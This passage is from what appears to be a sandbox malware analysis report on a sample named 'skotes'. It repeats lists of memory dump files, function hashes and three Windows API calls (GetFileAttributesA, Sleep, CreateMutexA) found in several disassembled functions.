                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 7500970dd31c3cf508ec90fc840381abead48dcfaede4a669dc5179d63b158af
                                                                                                                                              • Instruction ID: fe6f6cba435e4a12652cf792534311697ffec024e535210dd91808192b1246c4
                                                                                                                                              • Opcode Fuzzy Hash: 7500970dd31c3cf508ec90fc840381abead48dcfaede4a669dc5179d63b158af
                                                                                                                                              • Instruction Fuzzy Hash: C63148717043409BEB18DB68DD84BADB772AB96314F20863AE414B73D1C77D9990871A
                                                                                                                                              Function 0040A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A41B
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 4a574c7a82777d5daea48f23ee4f77c5fdccee369211dae91a2f447584d087d2
                                                                                                                                              • Instruction ID: 17e4180386c4bd2807e64a5d06c9af003e3f7a54cd91b54b1cf68110fae4351c
                                                                                                                                              • Opcode Fuzzy Hash: 4a574c7a82777d5daea48f23ee4f77c5fdccee369211dae91a2f447584d087d2
                                                                                                                                              • Instruction Fuzzy Hash: BB313971B003009BEB08DBB8DD89B6DB672EB86314F24862AE014B73D5D7BD5990865B
                                                                                                                                              Function 0040A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A550
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: db30252aad59b5deb3f3b0fddea5420fdf50c2efa82c76defb9ef50fde7e7ca3
                                                                                                                                              • Instruction ID: 16c91c8921310b6120f67e49507417ecf721b851789ce90cf3e9ee9f25b86078
                                                                                                                                              • Opcode Fuzzy Hash: db30252aad59b5deb3f3b0fddea5420fdf50c2efa82c76defb9ef50fde7e7ca3
                                                                                                                                              • Instruction Fuzzy Hash: 0E311A717042009BEB08DB78DD89B6DB772EB86318F24862AE054B73D1D77D9990871A
                                                                                                                                              Function 0040A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A685
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 8a0d26e10cbefae02a1633ac4902a544a93d27001b7e329b2b49e66d2ed36cef
                                                                                                                                              • Instruction ID: 709cb29e7328af448dcf07448c8c236c67edb2359e378381bdc173a3513cd83b
                                                                                                                                              • Opcode Fuzzy Hash: 8a0d26e10cbefae02a1633ac4902a544a93d27001b7e329b2b49e66d2ed36cef
                                                                                                                                              • Instruction Fuzzy Hash: 813128717043009BEB08DB78DD89B6DB772EB86314F24C63AE014B73D1C77D9990865A
                                                                                                                                              Function 0040A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A7BA
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
